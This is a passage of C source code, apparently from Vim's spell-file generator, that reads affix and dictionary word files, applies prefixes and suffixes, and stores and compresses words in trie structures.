* Return TRUE if strings "s1" and "s2" are equal. Also consider both being
* NULL as equal.
*/
static int
str_equal(char_u *s1, char_u *s2)
{
if (s1 == NULL || s2 == NULL)
return s1 == s2;
return STRCMP(s1, s2) == 0;
}
/*
* Add a from-to item to "gap". Used for REP and SAL items.
* They are stored case-folded.
*/
static void
add_fromto(
spellinfo_T *spin,
garray_T *gap,
char_u *from,
char_u *to)
{
fromto_T *ftp;
char_u word[MAXWLEN];
if (ga_grow(gap, 1) == OK)
{
ftp = ((fromto_T *)gap->ga_data) + gap->ga_len;
(void)spell_casefold(from, (int)STRLEN(from), word, MAXWLEN);
ftp->ft_from = getroom_save(spin, word);
(void)spell_casefold(to, (int)STRLEN(to), word, MAXWLEN);
ftp->ft_to = getroom_save(spin, word);
++gap->ga_len;
}
}
/*
* Convert a boolean argument in a SAL line to TRUE or FALSE;
*/
static int
sal_to_bool(char_u *s)
{
return STRCMP(s, "1") == 0 || STRCMP(s, "true") == 0;
}
/*
* Free the structure filled by spell_read_aff().
*/
static void
spell_free_aff(afffile_T *aff)
{
hashtab_T *ht;
hashitem_T *hi;
int todo;
affheader_T *ah;
affentry_T *ae;
vim_free(aff->af_enc);
/* All this trouble to free the "ae_prog" items... */
for (ht = &aff->af_pref; ; ht = &aff->af_suff)
{
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
vim_regfree(ae->ae_prog);
}
}
if (ht == &aff->af_suff)
break;
}
hash_clear(&aff->af_pref);
hash_clear(&aff->af_suff);
hash_clear(&aff->af_comp);
}
/*
* Read dictionary file "fname".
* Returns OK or FAIL;
*/
static int
spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile)
{
hashtab_T ht;
char_u line[MAXLINELEN];
char_u *p;
char_u *afflist;
char_u store_afflist[MAXWLEN];
int pfxlen;
int need_affix;
char_u *dw;
char_u *pc;
char_u *w;
int l;
hash_T hash;
hashitem_T *hi;
FILE *fd;
int lnum = 1;
int non_ascii = 0;
int retval = OK;
char_u message[MAXLINELEN + MAXWLEN];
int flags;
int duplicate = 0;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* The hashtable is only used to detect duplicated words. */
hash_init(&ht);
vim_snprintf((char *)IObuff, IOSIZE,
_("Reading dictionary file %s ..."), fname);
spell_message(spin, IObuff);
/* start with a message for the first line */
spin->si_msg_count = 999999;
/* Read and ignore the first line: word count. */
(void)vim_fgets(line, MAXLINELEN, fd);
if (!vim_isdigit(*skipwhite(line)))
EMSG2(_("E760: No word count in %s"), fname);
/*
* Read all the lines in the file one by one.
* The words are converted to 'encoding' here, before being added to
* the hashtable.
*/
while (!vim_fgets(line, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
if (line[0] == '#' || line[0] == '/')
continue; /* comment line */
/* Remove CR, LF and white space from the end. White space halfway
* the word is kept to allow e.g., "et al.". */
l = (int)STRLEN(line);
while (l > 0 && line[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty line */
line[l] = NUL;
#ifdef FEAT_MBYTE
/* Convert from "SET" to 'encoding' when needed. */
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, line, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, line);
continue;
}
w = pc;
}
else
#endif
{
pc = NULL;
w = line;
}
/* Truncate the word at the "/", set "afflist" to what follows.
* Replace "\/" by "/" and "\\" by "\". */
afflist = NULL;
for (p = w; *p != NUL; mb_ptr_adv(p))
{
if (*p == '\\' && (p[1] == '\\' || p[1] == '/'))
STRMOVE(p, p + 1);
else if (*p == '/')
{
*p = NUL;
afflist = p + 1;
break;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(w))
{
++non_ascii;
vim_free(pc);
continue;
}
/* This takes time, print a message every 10000 words. */
if (spin->si_verbose && spin->si_msg_count > 10000)
{
spin->si_msg_count = 0;
vim_snprintf((char *)message, sizeof(message),
_("line %6d, word %6d - %s"),
lnum, spin->si_foldwcount + spin->si_keepwcount, w);
msg_start();
msg_puts_long_attr(message, 0);
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Store the word in the hashtable to be able to find duplicates. */
dw = (char_u *)getroom_save(spin, w);
if (dw == NULL)
{
retval = FAIL;
vim_free(pc);
break;
}
hash = hash_hash(dw);
hi = hash_lookup(&ht, dw, hash);
if (!HASHITEM_EMPTY(hi))
{
if (p_verbose > 0)
smsg((char_u *)_("Duplicate word in %s line %d: %s"),
fname, lnum, dw);
else if (duplicate == 0)
smsg((char_u *)_("First duplicate word in %s line %d: %s"),
fname, lnum, dw);
++duplicate;
}
else
hash_add_item(&ht, hi, dw, hash);
flags = 0;
store_afflist[0] = NUL;
pfxlen = 0;
need_affix = FALSE;
if (afflist != NULL)
{
/* Extract flags from the affix list. */
flags |= get_affix_flags(affile, afflist);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needaffix))
need_affix = TRUE;
if (affile->af_pfxpostpone)
/* Need to store the list of prefix IDs with the word. */
pfxlen = get_pfxlist(affile, afflist, store_afflist);
if (spin->si_compflags != NULL)
/* Need to store the list of compound flags with the word.
* Concatenate them to the list of prefix IDs. */
get_compflags(affile, afflist, store_afflist + pfxlen);
}
/* Add the word to the word tree(s). */
if (store_word(spin, dw, flags, spin->si_region,
store_afflist, need_affix) == FAIL)
retval = FAIL;
if (afflist != NULL)
{
/* Find all matching suffixes and add the resulting words.
* Additionally do matching prefixes that combine. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_suff, &affile->af_pref,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
/* Find all matching prefixes and add the resulting words. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_pref, NULL,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
}
vim_free(pc);
}
if (duplicate > 0)
smsg((char_u *)_("%d duplicate word(s) in %s"), duplicate, fname);
if (spin->si_ascii && non_ascii > 0)
smsg((char_u *)_("Ignored %d word(s) with non-ASCII characters in %s"),
non_ascii, fname);
hash_clear(&ht);
fclose(fd);
return retval;
}
/*
* Check for affix flags in "afflist" that are turned into word flags.
* Return WF_ flags.
*/
static int
get_affix_flags(afffile_T *affile, char_u *afflist)
{
int flags = 0;
if (affile->af_keepcase != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_keepcase))
flags |= WF_KEEPCAP | WF_FIXCAP;
if (affile->af_rare != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_rare))
flags |= WF_RARE;
if (affile->af_bad != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_bad))
flags |= WF_BANNED;
if (affile->af_needcomp != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needcomp))
flags |= WF_NEEDCOMP;
if (affile->af_comproot != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_comproot))
flags |= WF_COMPROOT;
if (affile->af_nosuggest != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_nosuggest))
flags |= WF_NOSUGGEST;
return flags;
}
/*
* Get the list of prefix IDs from the affix list "afflist".
* Used for PFXPOSTPONE.
* Put the resulting flags in "store_afflist[MAXWLEN]" with a terminating NUL
* and return the number of affixes.
*/
static int
get_pfxlist(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
int id;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a postponed prefix flag if it appears in "af_pref"
* and it's ID is not zero. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_pref, key);
if (!HASHITEM_EMPTY(hi))
{
id = HI2AH(hi)->ah_newID;
if (id != 0)
store_afflist[cnt++] = id;
}
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
return cnt;
}
/*
* Get the list of compound IDs from the affix list "afflist" that are used
* for compound words.
* Puts the flags in "store_afflist[]".
*/
static void
get_compflags(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a compound flag if it appears in "af_comp". */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_comp, key);
if (!HASHITEM_EMPTY(hi))
store_afflist[cnt++] = HI2CI(hi)->ci_newID;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
}
/*
* Apply affixes to a word and store the resulting words.
* "ht" is the hashtable with affentry_T that need to be applied, either
* prefixes or suffixes.
* "xht", when not NULL, is the prefix hashtable, to be used additionally on
* the resulting words for combining affixes.
*
* Returns FAIL when out of memory.
*/
static int
store_aff_word(
spellinfo_T *spin, /* spell info */
char_u *word, /* basic word start */
char_u *afflist, /* list of names of supported affixes */
afffile_T *affile,
hashtab_T *ht,
hashtab_T *xht,
int condit, /* CONDIT_SUF et al. */
int flags, /* flags for the word */
char_u *pfxlist, /* list of prefix IDs */
int pfxlen) /* nr of flags in "pfxlist" for prefixes, rest
* is compound flags */
{
int todo;
hashitem_T *hi;
affheader_T *ah;
affentry_T *ae;
char_u newword[MAXWLEN];
int retval = OK;
int i, j;
char_u *p;
int use_flags;
char_u *use_pfxlist;
int use_pfxlen;
int need_affix;
char_u store_afflist[MAXWLEN];
char_u pfx_pfxlist[MAXWLEN];
size_t wordlen = STRLEN(word);
int use_condit;
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0 && retval == OK; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
/* Check that the affix combines, if required, and that the word
* supports this affix. */
if (((condit & CONDIT_COMB) == 0 || ah->ah_combine)
&& flag_in_afflist(affile->af_flagtype, afflist,
ah->ah_flag))
{
/* Loop over all affix entries with this name. */
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
{
/* Check the condition. It's not logical to match case
* here, but it is required for compatibility with
* Myspell.
* Another requirement from Myspell is that the chop
* string is shorter than the word itself.
* For prefixes, when "PFXPOSTPONE" was used, only do
* prefixes with a chop string and/or flags.
* When a previously added affix had CIRCUMFIX this one
* must have it too, if it had not then this one must not
* have one either. */
if ((xht != NULL || !affile->af_pfxpostpone
|| ae->ae_chop != NULL
|| ae->ae_flags != NULL)
&& (ae->ae_chop == NULL
|| STRLEN(ae->ae_chop) < wordlen)
&& (ae->ae_prog == NULL
|| vim_regexec_prog(&ae->ae_prog, FALSE,
word, (colnr_T)0))
&& (((condit & CONDIT_CFIX) == 0)
== ((condit & CONDIT_AFF) == 0
|| ae->ae_flags == NULL
|| !flag_in_afflist(affile->af_flagtype,
ae->ae_flags, affile->af_circumfix))))
{
/* Match. Remove the chop and add the affix. */
if (xht == NULL)
{
/* prefix: chop/add at the start of the word */
if (ae->ae_add == NULL)
*newword = NUL;
else
vim_strncpy(newword, ae->ae_add, MAXWLEN - 1);
p = word;
if (ae->ae_chop != NULL)
{
/* Skip chop string. */
#ifdef FEAT_MBYTE
if (has_mbyte)
{
i = mb_charlen(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_adv(p);
}
else
#endif
p += STRLEN(ae->ae_chop);
}
STRCAT(newword, p);
}
else
{
/* suffix: chop/add at the end of the word */
vim_strncpy(newword, word, MAXWLEN - 1);
if (ae->ae_chop != NULL)
{
/* Remove chop string. */
p = newword + STRLEN(newword);
i = (int)MB_CHARLEN(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_back(newword, p);
*p = NUL;
}
if (ae->ae_add != NULL)
STRCAT(newword, ae->ae_add);
}
use_flags = flags;
use_pfxlist = pfxlist;
use_pfxlen = pfxlen;
need_affix = FALSE;
use_condit = condit | CONDIT_COMB | CONDIT_AFF;
if (ae->ae_flags != NULL)
{
/* Extract flags from the affix list. */
use_flags |= get_affix_flags(affile, ae->ae_flags);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_needaffix))
need_affix = TRUE;
/* When there is a CIRCUMFIX flag the other affix
* must also have it and we don't add the word
* with one affix. */
if (affile->af_circumfix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_circumfix))
{
use_condit |= CONDIT_CFIX;
if ((condit & CONDIT_CFIX) == 0)
need_affix = TRUE;
}
if (affile->af_pfxpostpone
|| spin->si_compflags != NULL)
{
if (affile->af_pfxpostpone)
/* Get prefix IDS from the affix list. */
use_pfxlen = get_pfxlist(affile,
ae->ae_flags, store_afflist);
else
use_pfxlen = 0;
use_pfxlist = store_afflist;
/* Combine the prefix IDs. Avoid adding the
* same ID twice. */
for (i = 0; i < pfxlen; ++i)
{
for (j = 0; j < use_pfxlen; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (j == use_pfxlen)
use_pfxlist[use_pfxlen++] = pfxlist[i];
}
if (spin->si_compflags != NULL)
/* Get compound IDS from the affix list. */
get_compflags(affile, ae->ae_flags,
use_pfxlist + use_pfxlen);
/* Combine the list of compound flags.
* Concatenate them to the prefix IDs list.
* Avoid adding the same ID twice. */
for (i = pfxlen; pfxlist[i] != NUL; ++i)
{
for (j = use_pfxlen;
use_pfxlist[j] != NUL; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (use_pfxlist[j] == NUL)
{
use_pfxlist[j++] = pfxlist[i];
use_pfxlist[j] = NUL;
}
}
}
}
/* Obey a "COMPOUNDFORBIDFLAG" of the affix: don't
* use the compound flags. */
if (use_pfxlist != NULL && ae->ae_compforbid)
{
vim_strncpy(pfx_pfxlist, use_pfxlist, use_pfxlen);
use_pfxlist = pfx_pfxlist;
}
/* When there are postponed prefixes... */
if (spin->si_prefroot != NULL
&& spin->si_prefroot->wn_sibling != NULL)
{
/* ... add a flag to indicate an affix was used. */
use_flags |= WF_HAS_AFF;
/* ... don't use a prefix list if combining
* affixes is not allowed. But do use the
* compound flags after them. */
if (!ah->ah_combine && use_pfxlist != NULL)
use_pfxlist += use_pfxlen;
}
/* When compounding is supported and there is no
* "COMPOUNDPERMITFLAG" then forbid compounding on the
* side where the affix is applied. */
if (spin->si_compflags != NULL && !ae->ae_comppermit)
{
if (xht != NULL)
use_flags |= WF_NOCOMPAFT;
else
use_flags |= WF_NOCOMPBEF;
}
/* Store the modified word. */
if (store_word(spin, newword, use_flags,
spin->si_region, use_pfxlist,
need_affix) == FAIL)
retval = FAIL;
/* When added a prefix or a first suffix and the affix
* has flags may add a(nother) suffix. RECURSIVE! */
if ((condit & CONDIT_SUF) && ae->ae_flags != NULL)
if (store_aff_word(spin, newword, ae->ae_flags,
affile, &affile->af_suff, xht,
use_condit & (xht == NULL
? ~0 : ~CONDIT_SUF),
use_flags, use_pfxlist, pfxlen) == FAIL)
retval = FAIL;
/* When added a suffix and combining is allowed also
* try adding a prefix additionally. Both for the
* word flags and for the affix flags. RECURSIVE! */
if (xht != NULL && ah->ah_combine)
{
if (store_aff_word(spin, newword,
afflist, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL
|| (ae->ae_flags != NULL
&& store_aff_word(spin, newword,
ae->ae_flags, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL))
retval = FAIL;
}
}
}
}
}
}
return retval;
}
/*
* Read a file with a list of words.
*/
static int
spell_read_wordfile(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
long lnum = 0;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
char_u *p;
int l;
int retval = OK;
int did_word = FALSE;
int non_ascii = 0;
int flags;
int regionmask;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading word file %s ..."), fname);
spell_message(spin, IObuff);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Remove CR, LF and white space from the end. */
l = (int)STRLEN(rline);
while (l > 0 && rline[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty or blank line */
rline[l] = NUL;
/* Convert from "/encoding={encoding}" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
if (*line == '/')
{
++line;
if (STRNCMP(line, "encoding=", 9) == 0)
{
if (spin->si_conv.vc_type != CONV_NONE)
smsg((char_u *)_("Duplicate /encoding= line ignored in %s line %d: %s"),
fname, lnum, line - 1);
else if (did_word)
smsg((char_u *)_("/encoding= line after word ignored in %s line %d: %s"),
fname, lnum, line - 1);
else
{
#ifdef FEAT_MBYTE
char_u *enc;
/* Setup for conversion to 'encoding'. */
line += 9;
enc = enc_canonize(line);
if (enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, line, p_enc);
vim_free(enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
continue;
}
if (STRNCMP(line, "regions=", 8) == 0)
{
if (spin->si_region_count > 1)
smsg((char_u *)_("Duplicate /regions= line ignored in %s line %d: %s"),
fname, lnum, line);
else
{
line += 8;
if (STRLEN(line) > 16)
smsg((char_u *)_("Too many regions in %s line %d: %s"),
fname, lnum, line);
else
{
spin->si_region_count = (int)STRLEN(line) / 2;
STRCPY(spin->si_region_name, line);
/* Adjust the mask for a word valid in all regions. */
spin->si_region = (1 << spin->si_region_count) - 1;
}
}
continue;
}
smsg((char_u *)_("/ line ignored in %s line %d: %s"),
fname, lnum, line - 1);
continue;
}
flags = 0;
regionmask = spin->si_region;
/* Check for flags and region after a slash. */
p = vim_strchr(line, '/');
if (p != NULL)
{
*p++ = NUL;
while (*p != NUL)
{
if (*p == '=') /* keep-case word */
flags |= WF_KEEPCAP | WF_FIXCAP;
else if (*p == '!') /* Bad, bad, wicked word. */
flags |= WF_BANNED;
else if (*p == '?') /* Rare word. */
flags |= WF_RARE;
else if (VIM_ISDIGIT(*p)) /* region number(s) */
{
if ((flags & WF_REGION) == 0) /* first one */
regionmask = 0;
flags |= WF_REGION;
l = *p - '0';
if (l > spin->si_region_count)
{
smsg((char_u *)_("Invalid region nr in %s line %d: %s"),
fname, lnum, p);
break;
}
regionmask |= 1 << (l - 1);
}
else
{
smsg((char_u *)_("Unrecognized flags in %s line %d: %s"),
fname, lnum, p);
break;
}
++p;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(line))
{
++non_ascii;
continue;
}
/* Normal word: store it. */
if (store_word(spin, line, flags, regionmask, NULL, FALSE) == FAIL)
{
retval = FAIL;
break;
}
did_word = TRUE;
}
vim_free(pc);
fclose(fd);
if (spin->si_ascii && non_ascii > 0)
{
vim_snprintf((char *)IObuff, IOSIZE,
_("Ignored %d words with non-ASCII characters"), non_ascii);
spell_message(spin, IObuff);
}
return retval;
}
/*
* Get part of an sblock_T, "len" bytes long.
* This avoids calling free() for every little struct we use (and keeping
* track of them).
* The memory is cleared to all zeros.
* Returns NULL when out of memory.
*/
static void *
getroom(
spellinfo_T *spin,
size_t len, /* length needed */
int align) /* align for pointer */
{
char_u *p;
sblock_T *bl = spin->si_blocks;
if (align && bl != NULL)
/* Round size up for alignment. On some systems structures need to be
* aligned to the size of a pointer (e.g., SPARC). */
bl->sb_used = (bl->sb_used + sizeof(char *) - 1)
& ~(sizeof(char *) - 1);
if (bl == NULL || bl->sb_used + len > SBLOCKSIZE)
{
if (len >= SBLOCKSIZE)
bl = NULL;
else
/* Allocate a block of memory. It is not freed until much later. */
bl = (sblock_T *)alloc_clear(
(unsigned)(sizeof(sblock_T) + SBLOCKSIZE));
if (bl == NULL)
{
if (!spin->si_did_emsg)
{
EMSG(_("E845: Insufficient memory, word list will be incomplete"));
spin->si_did_emsg = TRUE;
}
return NULL;
}
bl->sb_next = spin->si_blocks;
spin->si_blocks = bl;
bl->sb_used = 0;
++spin->si_blocks_cnt;
}
p = bl->sb_data + bl->sb_used;
bl->sb_used += (int)len;
return p;
}
/*
* Make a copy of a string into memory allocated with getroom().
* Returns NULL when out of memory.
*/
static char_u *
getroom_save(spellinfo_T *spin, char_u *s)
{
char_u *sc;
sc = (char_u *)getroom(spin, STRLEN(s) + 1, FALSE);
if (sc != NULL)
STRCPY(sc, s);
return sc;
}
/*
* Free the list of allocated sblock_T.
*/
static void
free_blocks(sblock_T *bl)
{
sblock_T *next;
while (bl != NULL)
{
next = bl->sb_next;
vim_free(bl);
bl = next;
}
}
/*
* Allocate the root of a word tree.
* Returns NULL when out of memory.
*/
static wordnode_T *
wordtree_alloc(spellinfo_T *spin)
{
return (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
}
/*
* Store a word in the tree(s).
* Always store it in the case-folded tree. For a keep-case word this is
* useful when the word can also be used with all caps (no WF_FIXCAP flag) and
* used to find suggestions.
* For a keep-case word also store it in the keep-case tree.
* When "pfxlist" is not NULL store the word for each postponed prefix ID and
* compound flag.
*/
static int
store_word(
spellinfo_T *spin,
char_u *word,
int flags, /* extra flags, WF_BANNED */
int region, /* supported region(s) */
char_u *pfxlist, /* list of prefix IDs or NULL */
int need_affix) /* only store word with affix ID */
{
int len = (int)STRLEN(word);
int ct = captype(word, word + len);
char_u foldword[MAXWLEN];
int res = OK;
char_u *p;
(void)spell_casefold(word, len, foldword, MAXWLEN);
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, foldword, spin->si_foldroot, ct | flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_foldwcount;
if (res == OK && (ct == WF_KEEPCAP || (flags & WF_KEEPCAP)))
{
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, word, spin->si_keeproot, flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_keepwcount;
}
return res;
}
/*
* Add word "word" to a word tree at "root".
* When "flags" < 0 we are adding to the prefix tree where "flags" is used for
* "rare" and "region" is the condition nr.
* Returns FAIL when out of memory.
*/
static int
tree_add_word(
spellinfo_T *spin,
char_u *word,
wordnode_T *root,
int flags,
int region,
int affixID)
{
wordnode_T *node = root;
wordnode_T *np;
wordnode_T *copyp, **copyprev;
wordnode_T **prev = NULL;
int i;
/* Add each byte of the word to the tree, including the NUL at the end. */
for (i = 0; ; ++i)
{
/* When there is more than one reference to this node we need to make
* a copy, so that we can modify it. Copy the whole list of siblings
* (we don't optimize for a partly shared list of siblings). */
if (node != NULL && node->wn_refs > 1)
{
--node->wn_refs;
copyprev = prev;
for (copyp = node; copyp != NULL; copyp = copyp->wn_sibling)
{
/* Allocate a new node and copy the info. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_child = copyp->wn_child;
if (np->wn_child != NULL)
++np->wn_child->wn_refs; /* child gets extra ref */
np->wn_byte = copyp->wn_byte;
if (np->wn_byte == NUL)
{
np->wn_flags = copyp->wn_flags;
np->wn_region = copyp->wn_region;
np->wn_affixID = copyp->wn_affixID;
}
/* Link the new node in the list, there will be one ref. */
np->wn_refs = 1;
if (copyprev != NULL)
*copyprev = np;
copyprev = &np->wn_sibling;
/* Let "node" point to the head of the copied list. */
if (copyp == node)
node = np;
}
}
/* Look for the sibling that has the same character. They are sorted
* on byte value, thus stop searching when a sibling is found with a
* higher byte value. For zero bytes (end of word) the sorting is
* done on flags and then on affixID. */
while (node != NULL
&& (node->wn_byte < word[i]
|| (node->wn_byte == NUL
&& (flags < 0
? node->wn_affixID < (unsigned)affixID
: (node->wn_flags < (unsigned)(flags & WN_MASK)
|| (node->wn_flags == (flags & WN_MASK)
&& (spin->si_sugtree
? (node->wn_region & 0xffff) < region
: node->wn_affixID
< (unsigned)affixID)))))))
{
prev = &node->wn_sibling;
node = *prev;
}
if (node == NULL
|| node->wn_byte != word[i]
|| (word[i] == NUL
&& (flags < 0
|| spin->si_sugtree
|| node->wn_flags != (flags & WN_MASK)
|| node->wn_affixID != affixID)))
{
/* Allocate a new node. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_byte = word[i];
/* If "node" is NULL this is a new child or the end of the sibling
* list: ref count is one. Otherwise use ref count of sibling and
* make ref count of sibling one (matters when inserting in front
* of the list of siblings). */
if (node == NULL)
np->wn_refs = 1;
else
{
np->wn_refs = node->wn_refs;
node->wn_refs = 1;
}
if (prev != NULL)
*prev = np;
np->wn_sibling = node;
node = np;
}
if (word[i] == NUL)
{
node->wn_flags = flags;
node->wn_region |= region;
node->wn_affixID = affixID;
break;
}
prev = &node->wn_child;
node = *prev;
}
#ifdef SPELL_PRINTTREE
smsg((char_u *)"Added \"%s\"", word);
spell_print_tree(root->wn_sibling);
#endif
/* count nr of words added since last message */
++spin->si_msg_count;
if (spin->si_compress_cnt > 1)
{
if (--spin->si_compress_cnt == 1)
/* Did enough words to lower the block count limit. */
spin->si_blocks_cnt += compress_inc;
}
/*
* When we have allocated lots of memory we need to compress the word tree
* to free up some room. But compression is slow, and we might actually
* need that room, thus only compress in the following situations:
* 1. When not compressed before (si_compress_cnt == 0): when using
* "compress_start" blocks.
* 2. When compressed before and used "compress_inc" blocks before
* adding "compress_added" words (si_compress_cnt > 1).
* 3. When compressed before, added "compress_added" words
* (si_compress_cnt == 1) and the number of free nodes drops below the
* maximum word length.
*/
#ifndef SPELL_COMPRESS_ALLWAYS
if (spin->si_compress_cnt == 1
? spin->si_free_count < MAXWLEN
: spin->si_blocks_cnt >= compress_start)
#endif
{
/* Decrement the block counter. The effect is that we compress again
* when the freed up room has been used and another "compress_inc"
* blocks have been allocated. Unless "compress_added" words have
* been added, then the limit is put back again. */
spin->si_blocks_cnt -= compress_inc;
spin->si_compress_cnt = compress_added;
if (spin->si_verbose)
{
msg_start();
msg_puts((char_u *)_(msg_compressing));
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Compress both trees. Either they both have many nodes, which makes
* compression useful, or one of them is small, which means
* compression goes fast. But when filling the soundfold word tree
* there is no keep-case tree. */
wordtree_compress(spin, spin->si_foldroot);
if (affixID >= 0)
wordtree_compress(spin, spin->si_keeproot);
}
return OK;
}
/*
* Get a wordnode_T, either from the list of previously freed nodes or
* allocate a new one.
* Returns NULL when out of memory.
*/
static wordnode_T *
get_wordnode(spellinfo_T *spin)
{
wordnode_T *n;
if (spin->si_first_free == NULL)
n = (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
else
{
n = spin->si_first_free;
spin->si_first_free = n->wn_child;
vim_memset(n, 0, sizeof(wordnode_T));
--spin->si_free_count;
}
#ifdef SPELL_PRINTTREE
if (n != NULL)
n->wn_nr = ++spin->si_wordnode_nr;
#endif
return n;
}
/*
* Decrement the reference count on a node (which is the head of a list of
* siblings). If the reference count becomes zero free the node and its
* siblings.
* Returns the number of nodes actually freed.
*/
static int
deref_wordnode(spellinfo_T *spin, wordnode_T *node)
{
wordnode_T *np;
int cnt = 0;
if (--node->wn_refs == 0)
{
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_child != NULL)
cnt += deref_wordnode(spin, np->wn_child);
free_wordnode(spin, np);
++cnt;
}
++cnt; /* length field */
}
return cnt;
}
/*
* Free a wordnode_T for re-use later.
* Only the "wn_child" field becomes invalid.
*/
static void
free_wordnode(spellinfo_T *spin, wordnode_T *n)
{
n->wn_child = spin->si_first_free;
spin->si_first_free = n;
++spin->si_free_count;
}
/*
* Compress a tree: find tails that are identical and can be shared.
*/
static void
wordtree_compress(spellinfo_T *spin, wordnode_T *root)
{
hashtab_T ht;
int n;
int tot = 0;
int perc;
/* Skip the root itself, it's not actually used. The first sibling is the
* start of the tree. */
if (root->wn_sibling != NULL)
{
hash_init(&ht);
n = node_compress(spin, root->wn_sibling, &ht, &tot);
#ifndef SPELL_PRINTTREE
if (spin->si_verbose || p_verbose > 2)
#endif
{
if (tot > 1000000)
perc = (tot - n) / (tot / 100);
else if (tot == 0)
perc = 0;
else
perc = (tot - n) * 100 / tot;
vim_snprintf((char *)IObuff, IOSIZE,
_("Compressed %d of %d nodes; %d (%d%%) remaining"),
n, tot, tot - n, perc);
spell_message(spin, IObuff);
}
#ifdef SPELL_PRINTTREE
spell_print_tree(root->wn_sibling);
#endif
hash_clear(&ht);
}
}
/*
* Compress a node, its siblings and its children, depth first.
* Returns the number of compressed nodes.
*/
static int
node_compress(
spellinfo_T *spin,
wordnode_T *node,
hashtab_T *ht,
int *tot) /* total count of nodes before compressing,
incremented while going through the tree */
{
wordnode_T *np;
wordnode_T *tp;
wordnode_T *child;
hash_T hash;
